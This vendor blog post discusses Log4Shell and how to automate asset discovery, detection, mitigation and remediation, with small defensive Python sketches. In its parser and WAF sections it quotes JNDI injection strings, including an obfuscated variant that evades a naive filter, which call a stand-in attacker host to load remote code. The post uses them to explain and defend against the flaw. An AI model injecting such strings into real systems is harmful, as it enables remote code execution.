Mitigating the Next Log4Shell: Automating Your Vulnerability Management Program

By Leonid Belkind

Jan 3, 2022

Torq

As CVE-2021-44228, a.k.a. “Log4Shell” or the Apache Log4j Remote Code Execution vulnerability, continues to send shockwaves across the world of software, many security vendors and practitioners are rushing to provide recommendations on dealing with the crisis.

If you need immediate help mitigating the impact of Log4Shell, we’re here for that. But the goal of this post is to look forward. This isn’t the first high-impact vulnerability to be uncovered, and it won’t be the last. So it’s worth preparing your organization for the next one, so that you can respond faster, mitigate and remediate sooner, and have fewer weekends like the last one.

What is all the fuss about?

In case you missed the high-level description of the problem among the vast amount of content being written about it, here is a quick TLDR:

Log4j is a very commonly used logging library for software written in the Java programming language, used in solutions such as Kafka, Solr, Elasticsearch and many more
The library contains a capability (arguably violating the encapsulation principle of software engineering) that allows logged messages to contain dynamic “templates”, which cause the system to look up the data referred to in the template on an external service
After the information is retrieved from the external service, it can be treated as a Java object and executed inside the Log4j library (to resolve the “template”)
The template contains both the address of the external service to retrieve the data from and the data object to resolve. This allows an attacker to craft a “string” that, once written to the log, causes the system to pull executable data from a malicious server, resulting in Remote Code Execution
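To make the last point concrete, here is a minimal Python sketch that takes a log message apart the way the description above suggests: it finds the simplest form of a JNDI template and splits it into the protocol, the external server and the object to resolve. The function name, the regular expression and the example hostname are illustrative assumptions, not part of Log4j, and real exploit strings are often far less tidy.

```python
import re
from urllib.parse import urlsplit

# Matches only the simplest form of a JNDI lookup template: ${jndi:<url>}
JNDI_TEMPLATE = re.compile(r"\$\{jndi:([^}]+)\}", re.IGNORECASE)


def describe_lookup(log_message: str):
    """Return (scheme, server, object_name) for the first JNDI template found, or None."""
    match = JNDI_TEMPLATE.search(log_message)
    if match is None:
        return None
    url = urlsplit(match.group(1))
    return url.scheme, url.netloc, url.path.lstrip("/")


# Hypothetical attacker-controlled value that ends up in a log line.
message = "User-Agent: ${jndi:ldap://attacker.example:1389/Exploit}"
print(describe_lookup(message))
```

The point of the sketch is only that a single logged string carries everything the attacker needs: where to connect and what to fetch.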

You could say this is a classic case of “the road to hell is paved with good intentions”, at least in the minds of the designers of Log4j.

Preparing for the next Log4Shell

Building a foundation for engineering and security operations to react quickly to new vulnerabilities requires two things.

First, having a comprehensive vulnerability management program defined and rolled out across your organization.
Second, automating and orchestrating the processes and tools that make up this program into a continuous process that allows for rapid detection, mitigation and remediation of newly-uncovered vulnerabilities.

Below, we’ll outline the five phases of successful vulnerability management programs, and discuss how automation during each phase results in reduced overall risk.

Discover (Assets)

The first step is identifying the assets that might contain vulnerable components. This process differs fundamentally between self-hosted bare-metal data centers and virtualized public or private cloud environments. In the former case, periodic or continuous network scans are essential to discover newly deployed servers and services, whereas in the latter, modern CSPM (Cloud Security Posture Management) and CWPP (Cloud Workload Protection Platform) tools provide up-to-date information on the deployed assets.

Automating Discovery

Use automation to orchestrate regular scans or refreshes so that all newly deployed assets are accounted for. Pull data from both security and IT systems, normalize it, and compare the two lists, flagging any discrepancies for human review.
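As a rough illustration of that comparison, the Python sketch below normalizes two hostname lists and reports what each side is missing. The function names, the normalization rules and the example hostnames are assumptions made for the example; a real inventory would likely key on more than the hostname.

```python
def normalize(hostname: str) -> str:
    """Lower-case and strip whitespace and a trailing dot so the same host compares equal."""
    return hostname.strip().lower().rstrip(".")


def find_discrepancies(security_assets, it_assets):
    """Compare two asset lists and return what each side is missing."""
    security = {normalize(h) for h in security_assets}
    it = {normalize(h) for h in it_assets}
    return {
        "unknown_to_it": sorted(security - it),
        "unknown_to_security": sorted(it - security),
    }


# Hypothetical exports from a scanner (security) and a CMDB (IT).
scanner_hosts = ["Web-01.corp.example", "db-01.corp.example", "build-07.corp.example"]
cmdb_hosts = ["web-01.corp.example.", "db-01.corp.example", "mail-02.corp.example"]

for side, hosts in find_discrepancies(scanner_hosts, cmdb_hosts).items():
    print(side, hosts)  # each non-empty list is a candidate for human review
```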

Identify (Assets)

Knowing an asset exists is the first step, but it’s not enough. To ensure a swift and consistent response to new vulnerabilities, the following must be known about each asset:

Who is responsible for the asset (what team or individual should be contacted)
What is the role of the asset (application server, infrastructure / pipeline components, etc)
How the asset is managed (infrastructure as code, deployment from a ‘golden image’, etc.)

Achieving clarity on the above points for all of the assets under your control puts you in a very strong position for ensuring a swift and consistent response.

Automating Identification

Guaranteeing this information is at your fingertips when you need it most requires adopting an automated approach to your asset identification and metadata enrichment. Regular audits of improperly “cataloged” assets, coupled with automated metadata collection and appending (either via a CMDB solution or directly tagged to the assets themselves, depending on environment) ensure that you’re prepared to detect and respond swiftly.
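A regular audit of this kind can be very small. The sketch below, written in Python, checks each asset for the three pieces of information listed earlier (owner, role, how it is managed) and reports the gaps. The field names and the inventory layout are hypothetical; in practice the data would come from your CMDB or from tags on the assets themselves.

```python
# Hypothetical metadata keys corresponding to owner, role and management method.
REQUIRED_FIELDS = ("owner", "role", "managed_by")


def audit_assets(assets):
    """Map asset name -> list of required metadata fields that are missing or empty."""
    gaps = {}
    for name, metadata in assets.items():
        missing = [field for field in REQUIRED_FIELDS if not metadata.get(field)]
        if missing:
            gaps[name] = missing
    return gaps


inventory = {
    "web-01": {"owner": "team-storefront", "role": "application server", "managed_by": "terraform"},
    "build-07": {"owner": "", "role": "pipeline component"},
}
print(audit_assets(inventory))
```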

Detect (Vulnerabilities)

Detecting vulnerable assets is the role of a vulnerability scanner, CSPM, CWPP, or similar solution. It is important to understand that a vulnerable asset can be identified in two distinct scenarios:

When trying to roll out the asset into a production environment (if it is known to be vulnerable at that point)
When a new vulnerability is discovered or reported, and you need to find which assets that were considered safe when rolled out to production are now vulnerable

Advanced vulnerability detection solutions can take multiple layers of your architecture into account when determining whether a vulnerable component is actually exploitable, and prioritize the findings accordingly.

Automating Detection

The role of automation differs depending on the scenario:

In the first scenario (attempting to roll out a vulnerable component to production), automated rules should block the deployment unless an explicit exception is made and approved, with a full audit log of the decision.
In the second scenario, automation should collect all instances of the vulnerability across known assets as soon as it is detected, and then launch the following phases (mitigation and remediation) without delay.
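Both scenarios can be sketched in a few lines of Python. The first function is a deployment gate that only passes when every finding has an approved exception, and it records its decision; the second collects every known asset affected by a given vulnerability. The `Finding` type, the function names and the `EXAMPLE-0001` identifier are assumptions for illustration, not the interface of any particular scanner.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    asset: str
    vulnerability: str  # e.g. a CVE identifier


def gate_deployment(findings, approved_exceptions, audit_log):
    """Allow a deployment only if every finding has an approved exception; record the decision."""
    blocking = [f for f in findings if (f.asset, f.vulnerability) not in approved_exceptions]
    allowed = not blocking
    audit_log.append({"allowed": allowed, "blocking": [f.vulnerability for f in blocking]})
    return allowed


def affected_assets(findings, vulnerability):
    """Collect every known asset affected by a newly reported vulnerability."""
    return sorted({f.asset for f in findings if f.vulnerability == vulnerability})


audit_log = []
exceptions = {("web-01", "EXAMPLE-0001")}  # hypothetical approved exception
scan = [
    Finding("web-01", "EXAMPLE-0001"),
    Finding("web-01", "CVE-2021-44228"),
    Finding("search-02", "CVE-2021-44228"),
]
print(gate_deployment(scan, exceptions, audit_log))  # blocked by the unapproved findings
print(affected_assets(scan, "CVE-2021-44228"))       # input for mitigation and remediation
```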

Orchestrate Mitigation (if possible)

Mitigation is something that prevents the impact of the identified vulnerability or problem without the complex process of fixing the root cause.

While it is a practice that can be extremely useful as a stop-gap solution for a vulnerability that is endangering your services, it should be practiced with extreme caution, as it may mislead you into thinking that the problem was mitigated, whereas the reality is somewhat different.

Here are some examples, referring to mitigation suggestions for the particular log4j problem:

Removing the JndiLookup.class from the CLASSPATH at the vulnerable server to avoid the dangerous lookup behavior
Sounds like a good first step, at face value. If done properly, it will, at least, prevent the Remote Code Execution vulnerability from being exploited. If you are not closely familiar with the log4j library, you can’t say for sure how it will behave when it fails loading the class, but, at least, no one will be reaching out to the attacker’s servers.

Here are the caveats with this approach:

Let’s say you applied this to one or more servers. Are you sure there are no Auto Scaling groups or pod orchestrators that will create additional virtual servers from the vulnerable image in your cloud infrastructure within minutes? If there are, the work you just did is useless.
What if the vulnerable application is running inside containers on one or more hosts? What if these containers are being dynamically launched and shut down by an orchestrator or operator? Fixing the image they are launched from is a completely different matter.
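Because new servers and containers can reintroduce the class at any time, it helps to verify the removal repeatedly rather than once. The Python sketch below walks a directory tree and lists the .jar files that still contain JndiLookup.class at its usual path inside log4j-core. The function name is an assumption, and the check is deliberately simple: it does not look inside jars nested within other archives (such as fat jars or WAR files), so a clean result is not proof of safety.

```python
import zipfile
from pathlib import Path

# Path of the class inside a log4j-core jar.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def jars_with_jndi_lookup(root):
    """Return paths of .jar files under root that still contain JndiLookup.class."""
    hits = []
    for jar in sorted(Path(root).rglob("*.jar")):
        try:
            with zipfile.ZipFile(jar) as archive:
                if JNDI_LOOKUP in archive.namelist():
                    hits.append(str(jar))
        except zipfile.BadZipFile:
            continue  # not a readable archive; skip it
    return hits
```

Run on a schedule against every host or image (for example `jars_with_jndi_lookup("/opt")`), a check like this can flag instances that came back after an autoscaling event.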

Setting the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.
Another very reasonable suggestion, that is also susceptible to the caveats listed above, in addition to many open questions, such as:

Should I restart the processes after making these changes?
How?
Would it impact the production service?

Configure WAF / Proxy to block JNDI Lookup templates in HTTP Requests / Headers
Another measure that won’t, probably, hurt much, but will provide only partial protection. Blocking HTTP Requests containing something that looks like an attempt to exploit the vulnerability is not a bad idea. The thing is, it will not stop a somewhat sophisticated attacker. Data (that will end up being written to log, invoking a lookup) could be sent encrypted, encoded or broken into parts (to be combined into something that causes an exploitation), bypassing this defense.
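The limitation is easy to demonstrate. The Python sketch below implements a deliberately naive rule that looks for the literal text `${jndi:` and then tests it against an obfuscated payload that uses a nested lookup to assemble the same template. The rule and the example hostname are illustrative assumptions, not the behavior of any specific WAF product.

```python
import re

# A deliberately naive rule: block anything containing the literal "${jndi:".
NAIVE_RULE = re.compile(r"\$\{jndi:", re.IGNORECASE)


def naive_waf_blocks(header_value: str) -> bool:
    """Return True if the naive rule would block this header value."""
    return NAIVE_RULE.search(header_value) is not None


plain = "${jndi:ldap://attacker.example/a}"
# The nested ${lower:j} lookup resolves to "j", so the literal "${jndi:" never appears.
obfuscated = "${${lower:j}ndi:ldap://attacker.example/a}"

print(naive_waf_blocks(plain))       # the plain payload is caught
print(naive_waf_blocks(obfuscated))  # the obfuscated payload passes the rule
```

Tightening the pattern helps against known variants, but it remains a race against new encodings, which is why this measure is only partial protection.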

Automating Mitigation

While the above examples are specific to the current vulnerability, they highlight the challenges of applying a mitigation without a full picture of both the security and the infrastructure aspects.

Automation of mitigations should be handled with care to avoid unintended consequences. Whether updating firewall or CDN rules, or updating the configuration of impacted assets, a human-in-the-loop approach ensures that there’s vetting, visibility, and auditing for all actions taken, so unintended consequences can be easily addressed. Tying automated mitigation processes together with bot capabilities helps speed up the human aspects of the process, while ensuring this data is collected.
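A human-in-the-loop step can be modeled as a wrapper that refuses to run a mitigation until someone approves it, and that records the decision either way. The Python sketch below is one minimal way to express that idea; the function name, the shape of the audit entry and the `approver` callback (which in practice might be a chat bot prompt) are all assumptions.

```python
from datetime import datetime, timezone


def run_with_approval(action_name, action, approver, audit_log):
    """Run action only if approver(action_name) returns True; always record the decision."""
    approved = bool(approver(action_name))
    entry = {
        "action": action_name,
        "approved": approved,
        "at": datetime.now(timezone.utc).isoformat(),
    }
    if approved:
        entry["result"] = action()
    audit_log.append(entry)
    return approved


log = []
# Hypothetical mitigation and approver; a real approver would ask a person.
run_with_approval("add-waf-rule", lambda: "applied", lambda name: True, log)
run_with_approval("restart-production", lambda: "restarted", lambda name: False, log)
for entry in log:
    print(entry["action"], entry["approved"])
```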

Orchestrate Remediation

This is, actually, the main bulk of activity when it comes to managing vulnerabilities. Remediation requires involving the owners of the servers/services, guiding them through updating the vulnerable applications to resolve the vulnerabilities and deploying these to production. In a significant corporate environment, this is a multi-stage process involving multiple role players across different teams.

Relying on ticketing systems to bind all the activities and the actors together usually leads to a non-uniform response and a lot of manual work involved in making sure that everything has been handled properly.

Automating Remediation

Ensuring that the correct remediation steps are identified, the right owners involved, the correct timelines set, and then communicating across the multiple teams and stakeholders is no easy matter. Automating ticket creation, information sharing, and approvals helps accelerate the work, while automating verification and ticket updates after remediations are applied helps teams confidently ensure that all instances of a vulnerability have been patched.
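The two halves of that process, routing work to owners and verifying it afterwards, can be sketched in Python as follows. The first function groups affected assets into one ticket per owning team and sends unowned assets to a triage queue; the second uses the results of a rescan to decide which tickets must stay open. The function names, the `unassigned-triage` queue and the data shapes are hypothetical and stand in for calls to a real ticketing system and scanner.

```python
from collections import defaultdict


def build_tickets(affected, owners):
    """Group affected assets by owning team; unowned assets go to a triage queue."""
    by_owner = defaultdict(list)
    for asset in affected:
        by_owner[owners.get(asset, "unassigned-triage")].append(asset)
    return {owner: sorted(assets) for owner, assets in by_owner.items()}


def still_open(tickets, still_vulnerable):
    """Return owners whose tickets cannot be closed because a rescan still flags an asset."""
    return sorted(
        owner
        for owner, assets in tickets.items()
        if any(asset in still_vulnerable for asset in assets)
    )


affected = ["web-01", "search-02", "build-07"]
owners = {"web-01": "team-storefront", "search-02": "team-search"}
tickets = build_tickets(affected, owners)
print(tickets)
print(still_open(tickets, still_vulnerable={"search-02"}))
```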

Summary

Adoption of Continuous Vulnerability Management is the only way to ensure that your organization is ready for the next critical vulnerability to be discovered and announced. In the modern world of software engineering, re-use of open source software and software services makes the discovery of wide-impacting vulnerabilities a recurring reality.

The only way to be ready for efficient handling of vulnerabilities is to lay down a foundation for automated Vulnerability Management. The above article explains where such a foundation integrates into the existing processes and infrastructure.

Torq is a no-code automation and orchestration platform for security and operations. It is used today by the world’s leading organizations to automate security operations, including continuous vulnerability management processes according to the paradigm presented above.

Interested in trying continuous vulnerability management capabilities in Torq? Get started today.